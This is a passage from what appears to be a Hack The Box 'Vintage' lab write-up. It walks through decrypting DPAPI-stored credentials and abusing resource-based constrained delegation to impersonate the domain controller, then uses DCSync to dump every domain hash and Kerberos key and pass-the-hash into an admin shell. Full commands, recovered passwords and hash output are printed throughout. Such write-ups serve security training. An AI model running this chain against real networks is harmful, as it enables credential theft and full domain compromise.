-a-hs- 6/7/2024 1:17 PM 24 PreferredThere’s two files there that could be the master key. Trying to download either with Evil-WinRM fails:
*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> download 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
Info: Downloading C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115\\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 to 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError
rescue EstandardError => err
^^^^^^^^^^^^^^
Did you mean? StandardError I’ll just base64-encode them:
*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115\\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847'))
AgAAAAAAAAAAAAAANABkAGIAZgAwADQAZAA4AC0ANQAyADkAYgAtADQAYgA0AGMALQBiADQAYQBlAC0AOABlADgANwA1AGUANABmAGUAOAA0ADcAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA2or8mZsV0QcGzC0XUJ9K8FBGAAAJgAAAA2YAAJhSpSk/CQYorLpjFuO6lxoHg+a9CGghh0pqkMYfO5Irop3dQGYbS2b3KJo0qLO586XfAvV/0dK/fM8a4erXENVlgtsrHRG48O/VO0Egw0qMZld65hY3jxMWTkzfGqfjNK5ytEtwPHGkAgAAAFiAHjGrO47Qhcn7oxZZBrBQRgAACYAAAANmAABRlZY9IPg0gA9TOU3DaFwm1ylSDyf2HHVE2mTqFzwbK7ZHp2XH8Mx2rvk6EpPUtdIv4kkQU6GsO43Xyg+qcks13CkP8uIIo0ECAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwGUQAxdTpQrS3sEc8gVH9tmXllgaPOCz8cyowsRu8fkbCLFyIcsLVGKHQRv3PUJ1qmSeC604xcQlXI43XddWfFZ3tFF1yLQOSNwfbKDdGQiF3yTlYb6KoMvhQXzs1O1LLP2cUEFOGw8+Pg8uMN4KDBURRWfqmRksyn38bg3OKFSQ1K0CpdNzKfPvS6TnGuvHvnglzZdT5qwQ+nOdXFuJccenatjtlVgQNdp6yZOmpQjrkTtZOxz9b0JRsoOQS0NWu7WThQU4s8yeZkHaJRSJ5lohgdYpZiLJ4x1lG5jLz7/IX5pP6UK1cq5KwLjvaMdGsK9GDj3ofoB/OldTS7StCAXHfzvgjmTscAdxSARKV8ekuDWjsXgz7iZkV04lUG5Jo2FD9xrFdY1DqTSbr7oLdHAwzFBQX5RGnDhKFJXA0KJ29sz1zHGVn4/J4k0e/Hkop6YwRfEighbU=
*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115\\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'))
AgAAAAAAAAAAAAAAOQA5AGMAZgA0ADEAYQAzAC0AYQA1ADUAMgAtADQAYwBmADcALQBhADgAZAA3AC0AYQBjAGEAMgBkADYAZgA3ADMAMwA5AGIAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA6o788ZIMNhaSpbkSX0mC01BGAAAJgAAAA2YAABAM9ZX6Z/40RYL/aC+dw/D5oa7WMYBN56zwgXYX4QrAIb4DtJoM27zWgMxygJ36SpSHHHQGJMgTs6nZN5U/1q7DBIpQlsWk15jpmUFS2czCScuP9C+dGdYT+p6AWb3L7PZUPqNDHqZRAgAAALFxHXdcOeYbfN6CsYeVaYZQRgAACYAAAANmAABiEtEJeAVpg4QA0lnUzAsf6koPtccl1os9yZrj1gTAc/oSmhBNPEE3/VVVPZw9g3NP26Wj3vO36IOmtsXWYABkukmijrSaAZUCAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwr2BFf0a0DhdM8JymBww6mzQt8tVsTbDmCZ/uZu3bzOAOUXODaGaJOOKqRm2W8rHPOZ27YjtD1pd0MFJDocNJwdhN5pwTdz2v2JsrVVVE363zZjXHeXefhuL5AMwMQr6gpTsCGcxrd1ziTN9Q1lH9QtnYE7OZlbrZPhiWO2vvdX+UQcKlgpxcSGLaczL53/UJXrvt9hueRn+YXxnK+fiyZ0gmjMlP+yuxOiKSvHM/UT6NmuYewnApQrOBO3A5F1XKHguHKT+VS187uBu/TO1ZT4/CrsKws1aG7EkIXhRKzEgukAwn5nZlU6YaADdeQRDzCR1D0ycJKFyZd4QE1Nt6Kbgr+ukbiurwBJd/D1a3+WWCw+S2OJVHB9qqlcW11heJd+v9eGe1Wf6/PYCvyyWMsvusF8XUswgKQbkH821vscyNmJWDwMply/ZvellKuGQ1/s5gVqUkALQ=
I’ll do the same with the credential file:
*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\users\\c.neri\\appdata\\roaming\\microsoft\\credentials\\C4BB96844A5C9DD45D5B6A9859252BA6'))
AQAAAKIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vczmwAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAANlsnh9uZhRwM1xc/8CNBwwAAAAABIAAAKAAAAAQAAAAK+zRTF7v+bPA1UScG2CL4uAAAABoyaUl8s/1J1TabkeZkP1VvjzlbcQ61ojdLQpks7Q0/irEKMmlFOJ/Za2o8akFz3kS28HEeNGkg/3kGNOvhVbnZ2NJQHTJ12SgjFuAuPhdS9Ob2CvqW9xu7pDGXPt5AHKqlqRy+fajjcEYkGP0ki6sLBF/rpFnQvRQ9hCg8iVqyq3BpSdwOZ1h0Zxh8mbvDPv+XHw9+o6DabZifdfj+GuMRi+GDNLvv8orYUqHZ6hHO3vB4kDu5T4G8QsIAtULBs3V2ww1G7xdGI57BGKi4LEk6kuaEWopsCflsc5FK4a4xBQAAABSjIrXKMIH3qbzDSrnPMUzCyhkAA==For each of these three, I’ll paste the base64, decode it, and save it as a file on my host.
└─$ echo "AgAAAAAAAAAAAAAANABkAGIAZgAwADQAZAA4AC0ANQAyADkAYgAtADQAYgA0AGMALQBiADQAYQBlAC0AOABlADgANwA1AGUANABmAGUAOAA0ADcAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA2or8mZsV0QcGzC0XUJ9K8FBGAAAJgAAAA2YAAJhSpSk/CQYorLpjFuO6lxoHg+a9CGghh0pqkMYfO5Irop3dQGYbS2b3KJo0qLO586XfAvV/0dK/fM8a4erXENVlgtsrHRG48O/VO0Egw0qMZld65hY3jxMWTkzfGqfjNK5ytEtwPHGkAgAAAFiAHjGrO47Qhcn7oxZZBrBQRgAACYAAAANmAABRlZY9IPg0gA9TOU3DaFwm1ylSDyf2HHVE2mTqFzwbK7ZHp2XH8Mx2rvk6EpPUtdIv4kkQU6GsO43Xyg+qcks13CkP8uIIo0ECAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwGUQAxdTpQrS3sEc8gVH9tmXllgaPOCz8cyowsRu8fkbCLFyIcsLVGKHQRv3PUJ1qmSeC604xcQlXI43XddWfFZ3tFF1yLQOSNwfbKDdGQiF3yTlYb6KoMvhQXzs1O1LLP2cUEFOGw8+Pg8uMN4KDBURRWfqmRksyn38bg3OKFSQ1K0CpdNzKfPvS6TnGuvHvnglzZdT5qwQ+nOdXFuJccenatjtlVgQNdp6yZOmpQjrkTtZOxz9b0JRsoOQS0NWu7WThQU4s8yeZkHaJRSJ5lohgdYpZiLJ4x1lG5jLz7/IX5pP6UK1cq5KwLjvaMdGsK9GDj3ofoB/OldTS7StCAXHfzvgjmTscAdxSARKV8ekuDWjsXgz7iZkV04lUG5Jo2FD9xrFdY1DqTSbr7oLdHAwzFBQX5RGnDhKFJXA0KJ29sz1zHGVn4/J4k0e/Hkop6YwRfEighbU=" | base64 -d > 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ echo "AgAAAAAAAAAAAAAAOQA5AGMAZgA0ADEAYQAzAC0AYQA1ADUAMgAtADQAYwBmADcALQBhADgAZAA3AC0AYQBjAGEAMgBkADYAZgA3ADMAMwA5AGIAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA6o788ZIMNhaSpbkSX0mC01BGAAAJgAAAA2YAABAM9ZX6Z/40RYL/aC+dw/D5oa7WMYBN56zwgXYX4QrAIb4DtJoM27zWgMxygJ36SpSHHHQGJMgTs6nZN5U/1q7DBIpQlsWk15jpmUFS2czCScuP9C+dGdYT+p6AWb3L7PZUPqNDHqZRAgAAALFxHXdcOeYbfN6CsYeVaYZQRgAACYAAAANmAABiEtEJeAVpg4QA0lnUzAsf6koPtccl1os9yZrj1gTAc/oSmhBNPEE3/VVVPZw9g3NP26Wj3vO36IOmtsXWYABkukmijrSaAZUCAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwr2BFf0a0DhdM8JymBww6mzQt8tVsTbDmCZ/uZu3bzOAOUXODaGaJOOKqRm2W8rHPOZ27YjtD1pd0MFJDocNJwdhN5pwTdz2v2JsrVVVE363zZjXHeXefhuL5AMwMQr6gpTsCGcxrd1ziTN9Q1lH9QtnYE7OZlbrZPhiWO2vvdX+UQcKlgpxcSGLaczL53/UJXrvt9hueRn+YXxnK+fiyZ0gmjMlP+yuxOiKSvHM/UT6NmuYewnApQrOBO3A5F1XKHguHKT+VS187uBu/TO1ZT4/CrsKws1aG7EkIXhRKzEgukAwn5nZlU6YaADdeQRDzCR1D0ycJKFyZd4QE1Nt6Kbgr+ukbiurwBJd/D1a3+WWCw+S2OJVHB9qqlcW11heJd+v9eGe1Wf6/PYCvyyWMsvusF8XUswgKQbkH821vscyNmJWDwMply/ZvellKuGQ1/s5gVqUkALQ=" | base64 -d > 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ echo "AQAAAKIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vczmwAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAANlsnh9uZhRwM1xc/8CNBwwAAAAABIAAAKAAAAAQAAAAK+zRTF7v+bPA1UScG2CL4uAAAABoyaUl8s/1J1TabkeZkP1VvjzlbcQ61ojdLQpks7Q0/irEKMmlFOJ/Za2o8akFz3kS28HEeNGkg/3kGNOvhVbnZ2NJQHTJ12SgjFuAuPhdS9Ob2CvqW9xu7pDGXPt5AHKqlqRy+fajjcEYkGP0ki6sLBF/rpFnQvRQ9hCg8iVqyq3BpSdwOZ1h0Zxh8mbvDPv+XHw9+o6DabZifdfj+GuMRi+GDNLvv8orYUqHZ6hHO3vB4kDu5T4G8QsIAtULBs3V2ww1G7xdGI57BGKi4LEk6kuaEWopsCflsc5FK4a4xBQAAABSjIrXKMIH3qbzDSrnPMUzCyhkAA==" | base64 -d > C4BB96844A5C9DD45D5B6A9859252BA6
the second key worked
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ERROR: Padding is incorrect.
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : LegacyGeneric:target=admin_acc
Description :
Unknown :
Username : vintage\\c.neri_adm
Unknown : Uncr4ck4bl3P4ssW0rd0312
Let’s try to authenticate c.neri_adm
└─$ netexec smb dc01.vintage.htb -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [+] vintage.htb\\c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 RBCD
C.NERI_ADM@VINTAGE.HTB -> MemberOf -> DELEGATEDADMINS@VINTAGE.HTB -> AllowedToAct -> DC01.VINTAGE.HTB
To pull of this attack, I’ll need a compromised account with a service principal name (SPN). C.Neri_adm does not have one, and I don’t have permissions to add one. But, FS01$ does, and C.Neri_adm has GenericWrite over DelegatedAdmins, which means they can add accounts to the group. From there, I can have the FS01$ account request a ticket on behalf of any account. There are many ways to exploit this. I’ll get a CIFS ticket as the DC01$ computer account and use that to dump the hashes for the domain.
Add FS01$ to DelegatedAdmins
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-getTGT vintage.htb/'C.Neri_adm':'Uncr4ck4bl3P4ssW0rd0312' -dc-ip 10.10.11.45
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in C.Neri_adm.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=C.Neri_adm.ccache
└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember DelegatedAdmins 'fs01$'
[+] fs01$ added to DelegatedAdminsGet DC01$ ST
I’ll make a new ticket as FS01$: (on new terminal)
└─$ kinit 'fs01$@VINTAGE.HTB'
Password for fs01$@VINTAGE.HTB:
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB
Valid starting Expires Service principal
07/26/25 00:45:31 07/26/25 10:45:31 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 07/27/25 00:45:28
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/fs01$:fs01' -dc-ip dc01.vintage.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@cifs_dc01.vintage.htb@VINTAGE.HTB.ccacheNow we can DCSYNC
└─$ impacket-secretsdump vintage.htb/'dc01$'@dc01.vintage.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:5008d30496b4c5069ce1fc187b5b5960:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5f22c4cf44bc5277d90b8e281b9ba3735636bd95a72f3870ae3de93513ce63c5
Administrator:aes128-cts-hmac-sha1-96:c119630313138df8cd2e98b5e2d018f7
Administrator:des-cbc-md5:c4d5072368c27fba
krbtgt:aes256-cts-hmac-sha1-96:8d969dafdd00d594adfc782f13ababebbada96751ec4096bce85e122912ce1f0
krbtgt:aes128-cts-hmac-sha1-96:3c7375304a46526c00b9a7c341699bc0
krbtgt:des-cbc-md5:e923e308752658df
M.Rossi:aes256-cts-hmac-sha1-96:14d4ea3f6cd908d23889e816cd8afa85aa6f398091aa1ab0d5cd1710e48637e6
M.Rossi:aes128-cts-hmac-sha1-96:3f974cd6254cb7808040db9e57f7e8b4
M.Rossi:des-cbc-md5:7f2c7c982cd64361
R.Verdi:aes256-cts-hmac-sha1-96:c3e84a0d7b3234160e092f168ae2a19366465d0a4eab1e38065e79b99582ea31
R.Verdi:aes128-cts-hmac-sha1-96:d146fa335a9a7d2199f0dd969c0603fb
R.Verdi:des-cbc-md5:34464a58618f8938
L.Bianchi:aes256-cts-hmac-sha1-96:abcbbd86203a64f177288ed73737db05718cead35edebd26740147bd73e9cfed
L.Bianchi:aes128-cts-hmac-sha1-96:92067d46b54cdb11b4e9a7e650beb122
L.Bianchi:des-cbc-md5:01f2d667a19bce25
G.Viola:aes256-cts-hmac-sha1-96:f3b3398a6cae16ec640018a13a1e70fc38929cfe4f930e03b1c6f1081901844a
G.Viola:aes128-cts-hmac-sha1-96:367a8af99390ebd9f05067ea4da6a73b
G.Viola:des-cbc-md5:7f19b9cde5dce367
C.Neri:aes256-cts-hmac-sha1-96:c8b4d30ca7a9541bdbeeba0079f3a9383b127c8abf938de10d33d3d7c3b0fd06
C.Neri:aes128-cts-hmac-sha1-96:0f922f4956476de10f59561106aba118
C.Neri:des-cbc-md5:9da708a462b9732f
P.Rosa:aes256-cts-hmac-sha1-96:f9c16db419c9d4cb6ec6242484a522f55fc891d2ff943fc70c156a1fab1ebdb1
P.Rosa:aes128-cts-hmac-sha1-96:1cdedaa6c2d42fe2771f8f3f1a1e250a
P.Rosa:des-cbc-md5:a423fe64579dae73
svc_sql:aes256-cts-hmac-sha1-96:3bc255d2549199bbed7d8e670f63ee395cf3429b8080e8067eeea0b6fc9941ae
svc_sql:aes128-cts-hmac-sha1-96:bf4c77d9591294b218b8280c7235c684
svc_sql:des-cbc-md5:2ff4022a68a7834a
svc_ldap:aes256-cts-hmac-sha1-96:d5cb431d39efdda93b6dbcf9ce2dfeffb27bd15d60ebf0d21cd55daac4a374f2
svc_ldap:aes128-cts-hmac-sha1-96:cfc747dd455186dba6a67a2a340236ad
svc_ldap:des-cbc-md5:e3c48675a4671c04
svc_ark:aes256-cts-hmac-sha1-96:820c3471b64d94598ca48223f4a2ebc2491c0842a84fe964a07e4ee29f63d181
svc_ark:aes128-cts-hmac-sha1-96:55aec332255b6da8c1344357457ee717
svc_ark:des-cbc-md5:6e2c9b15bcec6e25
C.Neri_adm:aes256-cts-hmac-sha1-96:96072929a1b054f5616e3e0d0edb6abf426b4a471cce18809b65559598d722ff
C.Neri_adm:aes128-cts-hmac-sha1-96:ed3b9d69e24d84af130bdc133e517af0
C.Neri_adm:des-cbc-md5:5d6e9dd675042fa7
L.Bianchi_adm:aes256-cts-hmac-sha1-96:529fa80540d759052c6beb161d5982435a37811b3ad2a338e81b75797c11959e
L.Bianchi_adm:aes128-cts-hmac-sha1-96:7e4599a7f84c2868e20141bdc8608bd7
L.Bianchi_adm:des-cbc-md5:8fa746971a98fedf
DC01$:aes256-cts-hmac-sha1-96:f8ceb2e0ea58bf929e6473df75802ec8efcca13135edb999fcad20430dc06d4b
DC01$:aes128-cts-hmac-sha1-96:a8f037cb02f93e9b779a84441be1606a
DC01$:des-cbc-md5:c4f15ef8c4f43134
gMSA01$:aes256-cts-hmac-sha1-96:39847e723bd576449a295d008d66ae0bbf09610a1f14fedef69a93f2c0ba0024
gMSA01$:aes128-cts-hmac-sha1-96:49bcbd0a324fe0ec583ec07a29b2d3c1
gMSA01$:des-cbc-md5:2aef79763b76eff8
FS01$:aes256-cts-hmac-sha1-96:d57d94936002c8725eab5488773cf2bae32328e1ba7ffcfa15b81d4efab4bb02
FS01$:aes128-cts-hmac-sha1-96:ddf2a2dcc7a6080ea3aafbdf277f4958
FS01$:des-cbc-md5:dafb3738389e205b
[*] Cleaning up... Now we can auth as adminsitrator
─$ impacket-getTGT vintage.htb/administrator@dc01.vintage.htb -hashes :468c7497513f8243b59980f2240a10de
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator@dc01.vintage.htb.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=administrator@dc01.vintage.htb.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Invalid token was supplied
Success
It fails. That’s because the Administrator account is restricted from logging in. I can see this with netexec:
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ netexec smb dc01.vintage.htb -u Administrator -H 468c7497513f8243b59980f2240a10de -k
SMB dc01.vintage.htb 445 dc01 [*] x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.vintage.htb 445 dc01 [-] vintage.htb\\Administrator:468c7497513f8243b59980f2240a10de STATUS_LOGON_TYPE_NOT_GRANTED The Domain Admins group has two users in it:
I’ll try the same thing with L.Bianchi_adm:
we are in
─$ impacket-getTGT vintage.htb/L.Bianchi_adm@dc01.vintage.htb -hashes :6b751449807e0d73065b0423b64687f0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in L.Bianchi_adm@dc01.vintage.htb.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=L.Bianchi_adm@dc01.vintage.htb.ccache
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\L.Bianchi_adm\\Documents> and we found root.txt
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> dir
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/25/2025 3:36 PM 34 root.txt
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>
Last updated